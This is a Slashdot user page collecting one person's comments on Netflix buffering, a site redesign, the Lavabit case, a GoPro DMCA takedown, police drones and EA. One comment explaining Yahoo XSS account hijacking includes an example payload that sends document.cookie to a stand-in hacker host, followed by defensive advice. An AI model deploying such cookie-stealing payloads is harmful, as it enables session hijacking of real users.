Forgot your password?
typodupeerror

Comment: Re:Can confirm (Score 1) 289

by jest3r (#46306613) Attached to: ISP Fights Causing Netflix Packet Drops
Same here. For the past week or two I have been experiencing all sorts of glitches, stoppages and buffering through Netflix. My local ISP on demand service is fine though. Before last week everything was awesome!

Called my ISP about it - they said contact Netflix.

Maybe Netflix should add net neutrality to the House of Cards story arc to get the word out???

Comment: death of a "brand" (Score 5, Insightful) 2219

by jest3r (#46180687) Attached to: Slashdot Tries Something New; Audience Responds!
Please consider the following branding points:
  • Why did you make the logo smaller but increase the overall height of the top navbar? (now you have more wasted space up there for what?)
  • Why did you change the "Slashdot Green" colour? We all like the current green (the new green appears washed out).
  • Why are the Icons no longer beside the story titles? (the icons have always been a big part of the Slashdot "brand" and help with readability.)
  • Why did you remove the "Slashdot Green" title bars on all the stories? The title bars are also a big part of the Slashdot "brand" and also help with readability by clearly dividing the stories and providing an easy to see visual cue that delineates the new stories and even the comment threads.
  • Why did you remove the tags and/or make them boring? The tags added some dry humour to the stories (eg. whatcouldpossiblygowrong) which while subtle, was also a part of the Slashdot experience. Little unique details make a difference. Now the tags seem to be gone or just generic boring categorizations.
  • Why are you cutting off the Summary on the Homepage View? (reading the full summary without having to click anything is imperative to ensuring the website is readable.)
  • Why did you remove the Slashdot Green Title Bars from the comment threads? (the green title bars create an easy to see delineation between the comments and are easy to see even when scrolling fast. (they are also part of that Slashdot Brand I was talking about)

  • Why is there so much more padding and spacing between everything? Why are the font sizes so much larger? Did your user base suddenly become senior citizens?

Over the past decade the Slashdot logo, the Slashdot green, the title bars and icons, unique details and config options have become part and parcel of the "Slashdot Brand". It's what makes Slashdot unique. By ignoring this you weaken your brand and your reader's loyalty. You are basically stripping away all that is Slashdot without adding anything useful or new!!!!

+ - Lavabit Case Unsealed: FBI Demands Companies Secretly Turn Over Crypto Keys->

Submitted by jest3r
jest3r (458429) writes "Lavabit won a victory in court and were able to get the secret court order unsealed. The ACLU's Chris Soghoian called it the nuclear option. The court order revealed the FBI demanded Lavabit turn over their root SSL certificate, something that would allow them to monitor the traffic of every user of the service.

Lavabit offered an alternative method to tap into the single user in question but the FBI wasn't interested.

Lavabit could either comply or shut down. As such no US company that relies on SSL encryption can be trusted with sensitive data. Everything from Google to Facebook to Skype to your bank account is only encrypted by SSL keys, and if the FBI can force Lavabit to hand over their SSL key or face shutdown they can do it to anyone."

Link to Original Source

Comment: Re:Not a new exploit (Score 2) 50

by jest3r (#43246857) Attached to: Twitter, Hotmail, LinkedIn, Yahoo Open To Hijacking
All the hacker has to do is embed a link or image into an email and send that email to the Yahoo account of the victim. The victim then logs in and clicks the link or views the images. Assuming Yahoo doesn't filter out he embedded code the hackers gets the victim's cookies.

Simplified example:
Embedded image src in email: http://www.hacker.com/cookieparser.php?default=<script>alert(document.cookie)</script>

Obviously more complicated because you need to mask your embedded code to get through the filters but that is the basis of the XSS hack that has been hitting Yahoo all year ...

And because the sessions on the server never expire the hacker can gain access. I'm not sure how https would help in this scenario.

- Basically you need to pass a salted, hashed version of the session ID or random string (as a hidden form field) on all page views or form submissions and check that against both the session cookie and the hidden form field to make sure the cookie is coming from the original source (since there would be no way for the hacker to get that string as well). And invalidate the session if it doesn't match up. Also expire and delete the sessions after 6 hours of inactivity would help as well.

Comment: Re:IANAL: DMCA and Trademark Infringement (Score 1) 232

by jest3r (#43240957) Attached to: GoPro Issues DMCA Takedown Over Negative Review

If you own a Review Website ... time to move the hosting outside of the USA.

Why does the hosting provider have to get involved anyways? Isn't the content of the website the responsibility of the domain owner? Someone please explain why the hosting company would have shut the entire website down if they didn't remove the page?

Comment: Re:Please fly over my house (Score 1) 158

by jest3r (#43223267) Attached to: FAA Grants Arlington Texas Police Department Permission To Fly UAVs

If one of these things is flying over YOUR PROPERTY are you allowed to blast it out of the sky?

Or will doing so bring the wrath of the justice department upon you until you are either bankrupt, in jail, or worse.

It seems like surveillance state / police state is becoming a reality.

Comment: Re:Tipping point ... (Score 1) 427

by jest3r (#43212549) Attached to: Electronics Arts CEO Ousted In Wake of SimCity Launch Disaster

No-one said it was a conspiracy. SimCity was just the tipping point.

EA has made MANY terrible decisions over the past 5 years. No conspiracy ... just a company out of touch with reality and losing touch with their core market. CEO gets fired.

Madden continued to be a strong NFL sports franchise because there's no other official NFL games anymore ...

"If there isn't a population problem, why is the government putting cancer in the cigarettes?" -- the elder Steptoe, c. 1970

Working...